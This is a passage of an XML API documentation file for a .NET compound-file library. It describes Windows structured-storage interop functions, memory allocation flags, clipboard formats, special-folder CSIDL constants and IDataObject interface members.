        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgCreatePropSetStg(Syncfusion.CompoundFile.DocIO.Native.IStorage,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage@)">
            <summary>
            The StgCreatePropSetStg function creates a property set storage object from a specified storage object.
            </summary>
            <param name="pStorage">Pointer to the storage object that contains or is to 
            contain one or more property sets.</param>
            <param name="dwReserved">Reserved for future use; must be zero.</param>
            <param name="ppPropSetStg">Pointer to IPropertySetStorage* pointer variable that receives the 
            interface pointer to the property-set storage object. </param>
            <returns>S_OK - The property set storage object was successfully created.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgCreatePropSetStgOle(Syncfusion.CompoundFile.DocIO.Native.IStorage,System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IPropertySetStorage@)">
            <summary>
            The StgCreatePropSetStg function creates a property set storage object from a specified storage object.
            </summary>
            <param name="pStorage">Pointer to the storage object that contains or is to 
            contain one or more property sets.</param>
            <param name="dwReserved">Reserved for future use; must be zero.</param>
            <param name="ppPropSetStg">Pointer to IPropertySetStorage* pointer variable that receives the 
            interface pointer to the property-set storage object. </param>
            <returns>S_OK - The property set storage object was successfully created.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.CreateILockBytesOnHGlobal(System.IntPtr,System.Boolean,Syncfusion.CompoundFile.DocIO.Native.ILockBytes@)">
            <summary>
            The CreateILockBytesOnHGlobal function creates a byte array object, using global memory 
            as the physical device, which is intended to be the compound file foundation.
            </summary>
            <param name="hGlobal">The memory handle allocated by the GlobalAlloc function.</param>
            <param name="fDeleteOnRelease">A flag that specifies whether the underlying handle for 
            this byte array object should be automatically freed when the object is released.</param>
            <param name="ppLkbyt">The address of ILockBytes pointer variable that receives the interface 
            pointer to the new byte array object.</param>
            <returns>S_OK - The byte array object was created successfully.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgCreateDocfileOnILockBytes(Syncfusion.CompoundFile.DocIO.Native.ILockBytes,Syncfusion.CompoundFile.DocIO.Native.STGM,System.Int32,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            The StgCreateDocfileOnILockBytes function creates and opens a new compound file 
            storage object on top of a byte-array object provided by the caller.
            </summary>
            <param name="plkbyt">A pointer to the ILockBytes interface on the underlying 
            byte-array object on which to create a compound file.</param>
            <param name="grfMode">Specifies the access mode to use when opening the new compound file. 
            For more information, see STGM Constants.</param>
            <param name="reserved">Reserved for future use; must be zero.</param>
            <param name="ppstgOpen">A pointer to the location of the IStorage pointer on the new storage object.</param>
            <returns>
            S_OK - Indicates that the compound file was successfully created.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.StgOpenStorageOnILockBytes(Syncfusion.CompoundFile.DocIO.Native.ILockBytes,Syncfusion.CompoundFile.DocIO.Native.IStorage,Syncfusion.CompoundFile.DocIO.Native.STGM,System.Int32,System.Int32,Syncfusion.CompoundFile.DocIO.Native.IStorage@)">
            <summary>
            The StgOpenStorageOnILockBytes function opens an existing storage object that does not reside in a 
            disk file, but instead has an underlying byte array provided by the caller.
            </summary>
            <param name="plkbyt"> ILockBytes pointer to the underlying byte array object that contains the 
            storage object to be opened.</param>
            <param name="pStgPriority"> Most often NULL. If not NULL, this parameter is used instead of the 
            plkbyt parameter to specify the storage object to open. In this case, it points to the IStorage 
            interface on a previously opened root storage object, most often one that was opened in priority mode.</param>
            <param name="grfMode">Specifies the access mode to use to open the storage object.</param>
            <param name="snbExclude">Can be NULL. If not NULL, this parameter points to a block of elements in this 
            storage that are to be excluded as the storage object is opened. This exclusion occurs independently of 
            whether a snapshot copy happens on the open.</param>
            <param name="reserved">Indicates reserved for future use; must be zero.</param>
            <param name="ppstgOpen">Points to the location of an IStorage pointer to the opened storage on successful return.</param>
            <returns>S_OK - The storage object was successfully opened.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.GlobalAlloc(Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags,System.Int32)">
            <summary>
            The GlobalAlloc function allocates the specified number of bytes from the heap.
            Windows memory management does not provide a separate local heap and global heap.
            </summary>
            <param name="flags">Memory allocation attributes.</param>
            <param name="size">Number of bytes to allocate.</param>
            <returns>
            If the function succeeds, the return value is a handle to the newly
            allocated memory object. If the function fails, the return value is NULL.
            To get extended error information, call GetLastError.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.GlobalReAlloc(System.IntPtr,System.Int32,Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags)">
            <summary>
            
            </summary>
            <param name="hMem"></param>
            <param name="bytes"></param>
            <param name="flags"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.API.GlobalFree(System.IntPtr)">
            <summary>
            
            </summary>
            <param name="hMem"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags">
            <summary>
            Flags for GlobalAlloc function.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags.GMEM_FIXED">
            <summary>
            Allocates fixed memory. The return value is a pointer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags.GMEM_MOVEABLE">
            <summary>
            Allocates movable memory. Memory blocks are never moved in physical memory, 
            but they can be moved within the default heap.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags.GMEM_ZEROINIT">
            <summary>
            Initializes memory contents to zero.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.API.GlobalAllocFlags.GMEM_NODISCARD">
            <summary>
            NO Discard memory.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT">
            <summary>
            Predefined Clipboard Formats.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_TEXT">
            <summary>
            Text clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_BITMAP">
            <summary>
            Bitmap clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_METAFILEPICT">
            <summary>
            METAFILEPICT clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_SYLK">
            <summary>
            Sylk clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_DIF">
            <summary>
            Dif clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_TIFF">
            <summary>
            Tiff clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_OEMTEXT">
            <summary>
            Oemtext clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_DIB">
            <summary>
            Dib clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_PALETTE">
            <summary>
            Pallette clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_PENDATA">
            <summary>
            Pendata clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_RIFF">
            <summary>
            Riff clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_WAVE">
            <summary>
            Wave clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_UNICODETEXT">
            <summary>
            Unicodetext clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_ENHMETAFILE">
            <summary>
            Enhmetafile clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_HDROP">
            <summary>
            Hdrop clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_LOCALE">
            <summary>
            Locale clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_MAX">
            <summary>
            Max clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_OWNERDISPLAY">
            <summary>
            Ownerdisplay clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_DSPTEXT">
            <summary>
            Dsptext clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_DSPBITMAP">
            <summary>
            Dspbitmap clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_DSPMETAFILEPICT">
            <summary>
            Dspmetafilepict clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_DSPENHMETAFILE">
            <summary>
            Dspenhmetafile clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_PRIVATEFIRST">
            <summary>
            Privatefirst clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_PRIVATELAST">
            <summary>
            Privatelast clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_GDIOBJFIRST">
            <summary>
            Gdiobjfirst clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CLIPFORMAT.CF_GDIOBJLAST">
            <summary>
            Gdiobjlast clipboard format.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.DVASPECT">
            <summary>
            The DVASPECT enumeration values specify the desired data or view aspect of the object when drawing or getting data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.DVASPECT.DVASPECT_CONTENT">
            <summary>
            Provides a representation of an object so it can be displayed as an embedded object inside of a container.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.DVASPECT.DVASPECT_THUMBNAIL">
            <summary>
            Provides a thumbnail representation of an object so it can be displayed in a browsing tool.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.DVASPECT.DVASPECT_ICON">
            <summary>
            Provides an iconic representation of an object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.DVASPECT.DVASPECT_DOCPRINT">
            <summary>
            Provides a representation of the object on the screen as though it were printed to a printer 
            using the Print command from the File menu.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.TYMED">
            <summary>
            The TYMED enumeration values indicate the type of storage medium being used in a data transfer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_NULL">
            <summary>
            No data is being passed. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_HGLOBAL">
            <summary>
            The storage medium is a global memory handle (HGLOBAL). Allocate the global 
            handle with the GMEM_SHARE flag.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_FILE">
            <summary>
            The storage medium is a disk file identified by a path. If the STGMEDIUM 
            punkForRelease member is NULL, the destination process should use OpenFile to delete the file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_ISTREAM">
            <summary>
            The storage medium is a stream object identified by an IStream pointer. Use 
            ISequentialStream::Read to read the data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_ISTORAGE">
            <summary>
            The storage medium is a storage component identified by an IStorage pointer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_GDI">
            <summary>
            The storage medium is a GDI component (HBITMAP). If the STGMEDIUM punkForRelease member is 
            NULL, the destination process should use DeleteObject to delete the bitmap.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_MFPICT">
            <summary>
            The storage medium is a metafile (HMETAFILE). Use the Windows or WIN32 functions to 
            access the metafile's data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.TYMED.TYMED_ENHMF">
            <summary>
            The storage medium is an enhanced metafile. If the STGMEDIUM punkForRelease member is NULL, 
            the destination process should use DeleteEnhMetaFile to delete the bitmap.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.CSIDL">
            <summary>
            CSIDL values provide a unique system-independent way to identify special folders used frequently 
            by applications, but which may not have the same name or location on any given system.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_DESKTOP">
            <summary>
            The virtual folder representing the Windows desktop, the root of the namespace.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_INTERNET">
            <summary>
            A virtual folder representing the Internet.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PROGRAMS">
            <summary>
            The file system directory that contains the user's program groups (which are themselves file system directories).
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_CONTROLS">
            <summary>
            The virtual folder containing icons for the Control Panel applications.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PRINTERS">
            <summary>
            The virtual folder containing installed printers.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PERSONAL">
            <summary>
            The virtual folder representing the My Documents desktop item.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_FAVORITES">
            <summary>
            The file system directory that serves as a common repository for the user's favorite items.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_STARTUP">
            <summary>
            The file system directory that corresponds to the user's Startup program group.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_RECENT">
            <summary>
            The file system directory that contains shortcuts to the user's most recently used documents.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_SENDTO">
            <summary>
            The file system directory that contains Send To menu items.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_BITBUCKET">
            <summary>
            The virtual folder containing the objects in the user's Recycle Bin.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_STARTMENU">
            <summary>
            The file system directory containing Start menu items.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_DESKTOPDIRECTORY">
            <summary>
            The file system directory used to physically store file objects on the desktop.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_DRIVES">
            <summary>
            The virtual folder representing My Computer, containing everything on the local 
            computer: storage devices, printers, and Control Panel.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_NETWORK">
            <summary>
            A virtual folder representing Network Neighborhood, the root of the network namespace hierarchy.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_NETHOOD">
            <summary>
            A file system directory containing the link objects that may exist in the My Network Places virtual folder.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_FONTS">
            <summary>
            A virtual folder containing fonts.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_TEMPLATES">
            <summary>
            The file system directory that serves as a common repository for document templates.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_STARTMENU">
            <summary>
            The file system directory that contains the programs and folders that appear on the Start menu for all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_PROGRAMS">
            <summary>
            The file system directory that contains the directories for the common program groups that appear on the Start 
            menu for all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_STARTUP">
            <summary>
            The file system directory that contains the programs that appear in the Startup folder for all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_DESKTOPDIRECTORY">
            <summary>
            The file system directory that contains files and folders that appear on the desktop for all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_APPDATA">
            <summary>
            The file system directory that serves as a common repository for application-specific data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PRINTHOOD">
            <summary>
            The file system directory that contains the link objects that 
            can exist in the Printers virtual folder.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_LOCAL_APPDATA">
            <summary>
            The file system directory that serves as a data repository for local (nonroaming) applications.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_ALTSTARTUP">
            <summary>
            The file system directory that corresponds to the user's nonlocalized Startup program group.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_ALTSTARTUP">
            <summary>
            The file system directory that corresponds to the nonlocalized Startup program group for all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_FAVORITES">
            <summary>
            The file system directory that serves as a common repository for favorite items common to all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_INTERNET_CACHE">
            <summary>
            The file system directory that serves as a common repository for temporary Internet files.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COOKIES">
            <summary>
            The file system directory that serves as a common repository for Internet cookies.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_HISTORY">
            <summary>
            The file system directory that serves as a common repository for Internet history items.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_APPDATA">
            <summary>
            The file system directory containing application data for all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_WINDOWS">
            <summary>
            The Windows directory or SYSROOT. This corresponds to the %windir% or %SYSTEMROOT% 
            environment variables.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_SYSTEM">
            <summary>
            The Windows System folder.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PROGRAM_FILES">
            <summary>
            The Program Files folder.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_MYPICTURES">
            <summary>
            The file system directory that serves as a common repository for image files.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PROFILE">
            <summary>
            The file system directory containing user profile folders.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_SYSTEMX86">
            <summary>
            x86 system directory on RISC.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PROGRAM_FILESX86">
            <summary>
            x86 C:\Program Files on RISC. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PROGRAM_FILES_COMMON">
            <summary>
            A folder for components that are shared across applications.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_PROGRAM_FILES_COMMONX86">
            <summary>
            x86 Program Files\Common on RISC
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_TEMPLATES">
            <summary>
            The file system directory that serves as a common repository for document templates.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_DOCUMENTS">
            <summary>
            The file system directory that contains documents that are common to all users.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_COMMON_ADMINTOOLS">
            <summary>
            The file system directory containing administrative tools for all users of the computer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_ADMINTOOLS">
            <summary>
            The file system directory that is used to store administrative tools for an individual user.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_CONNECTIONS">
            <summary>
            Network and Dial-up Connections
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_FLAG_CREATE">
            <summary>
            Combine with CSIDL_ value to force folder creation in SHGetFolderPath().
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_FLAG_DONT_VERIFY">
            <summary>
            Combine with CSIDL_ value to return an unverified folder path.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.CSIDL.CSIDL_FLAG_MASK">
            <summary>
             Mask for all possible flag values.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM">
            <summary>
            Can be time intensive.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM.tymed">
            <summary>
            A platform-specific type that is used to represent a pointer to TYMED struct.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM.pStorage">
            <summary>
            A platform-specific type that is used to represent a pointer or a handle to storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM.pUnkForRelease">
            <summary>
            A platform-specific type that is used to represent a pointer or a handle to unknown.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.FORMATETC">
            <summary>
            The FORMATETC structure is a generalized Clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.FORMATETC.cfFormat">
            <summary>
            Particular clipboard format of interest.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.FORMATETC.ptd">
            <summary>
            Pointer to a DVTARGETDEVICE structure containing information about the target 
            device for which the data is being composed.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.FORMATETC.dwAspect">
            <summary>
            One of the DVASPECT enumeration constants that indicate how much detail should 
            be contained in the rendering.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.FORMATETC.lindex">
            <summary>
            Part of the aspect when the data must be split across page boundaries. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.FORMATETC.tymed">
            <summary>
            One of the TYMED enumeration constants which indicate the type of storage medium 
            used to transfer the object's data.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.DATADIR">
             <summary>
            The DATADIR enumeration values specify the direction of the data flow in the 
            dwDirection parameter of the IDataObject::EnumFormatEtc method.
             </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.DATADIR.DATADIR_GET">
            <summary>
            Requests that IDataObject::EnumFormatEtc supply an enumerator for the 
            formats that can be specified in IDataObject::GetData.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.DATADIR.DATADIR_SET">
            <summary>
            Requests that IDataObject::EnumFormatEtc supply an enumerator for the 
            formats that can be specified in IDataObject::SetData.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC">
            <exclude/>
             <summary>
             The IEnumFORMATETC interface is used to enumerate an array of FORMATETC structures.
             </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC.Clone(Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC@)">
            <summary>
            This method creates another enumerator that contains the same enumeration state as the current one.
            </summary>
            <param name="ppenum">Address of the IEnumFORMATETC* pointer variable that receives the interface 
            pointer to the enumeration object. </param>
            <returns>This method supports the standard return values E_INVALIDARG, E_OUTOFMEMORY, and E_UNEXPECTED.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC.RemoteNext(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,System.UInt32@)">
            <summary>
            Retrieves the next celt items in the enumeration sequence.
            </summary>
            <param name="celt">Number of elements being requested.</param>
            <param name="rgelt">Array of size celt (or larger) of the elements of interest. 
            The type of this parameter depends on the item being enumerated.</param>
            <param name="pceltFetched">Pointer to the number of elements actually supplied in rgelt. 
            The caller can pass in NULL if celt is 1.</param>
            <returns>S_OK is returned if the number of elements supplied is celt; S_FALSE otherwise.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC.Reset">
            <summary>
            This method resets the enumeration sequence to the beginning.
            </summary>
            <returns>If the method succeeds, the return value is S_OK.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC.Skip(System.UInt32)">
            <summary>
            This method skips over the next specified number of elements in the enumeration sequence.
            </summary>
            <param name="celt">Number of elements to be skipped.</param>
            <returns>S_OK is returned if the number of elements skipped is celt; otherwise, S_FALSE.</returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.IComDataObject">
             <summary>
            The IDataObject interface specifies methods that enable data transfer and notification of changes in data.
             </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.GetData(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM@)">
            <summary>
            Called by a data consumer to obtain data from a source data object.
            </summary>
            <param name="pformatetcIn">Pointer to the FORMATETC structure that defines the 
            format, medium, and target device to use when passing the data. </param>
            <param name="pRemoteMedium">Pointer to the STGMEDIUM structure that indicates the 
            storage medium containing the returned data through its tymed member, and the responsibility 
            for releasing the medium through the value of its pUnkForRelease member.</param>
            <returns>
            S_OK - Data was successfully retrieved and placed in the storage medium provided.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.GetDataHere(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM@)">
            <summary>
            Called by a data consumer to obtain data from a source data object. This method differs 
            from the GetData method in that the caller must allocate and free the specified storage medium.
            </summary>
            <param name="pformatetc">Pointer to the FORMATETC structure that defines the format, medium, and target 
            device to use when passing the data.</param>
            <param name="pRemoteMedium">Pointer to the STGMEDIUM structure that defines the storage medium 
            containing the data being transferred.</param>
            <returns>
            S_OK - Data was successfully retrieved and placed in the storage medium provided. 
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.QueryGetData(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@)">
            <summary>
            Determines whether the data object is capable of rendering the data described in the FORMATETC structure.
            </summary>
            <param name="pformatetc">Pointer to the FORMATETC structure defining the format, medium, and target 
            device to use for the query.</param>
            <returns>
            S_OK - Subsequent call to IDataObject::GetData would probably be successful.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.GetCanonicalFormatEtc(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.FORMATETC@)">
            <summary>
            Provides a standard FORMATETC structure that is logically equivalent to one that is more complex.
            </summary>
            <param name="pformatectIn">Pointer to the FORMATETC structure that defines the format, medium, 
            and target device that the caller would like to use to retrieve data in a subsequent call such 
            as IDataObject::GetData.</param>
            <param name="pformatetcOut">Pointer to a FORMATETC structure that contains the most general information 
            possible for a specific rendering, making it canonically equivalent to pFormatetcIn.</param>
            <returns>
            S_OK - The returned FORMATETC structure is different from the one that was passed. 
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.SetData(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM@,System.Int32)">
            <summary>
            Called by an object containing a data source to transfer data to the object that implements this method.
            </summary>
            <param name="pformatetc">Pointer to the FORMATETC structure defining the format used by the data object 
            when interpreting the data contained in the storage medium.</param>
            <param name="pmedium">Pointer to the STGMEDIUM structure defining the storage medium in which the 
            data is being passed.</param>
            <param name="fRelease">If TRUE, the data object called, which implements IDataObject::SetData, owns 
            the storage medium after the call returns. This means it must free the medium after it has been used 
            by calling the ReleaseStgMedium function.</param>
            <returns>S_OK - Data was successfully transferred.
            Otherwise error code.
            </returns>
        </member>
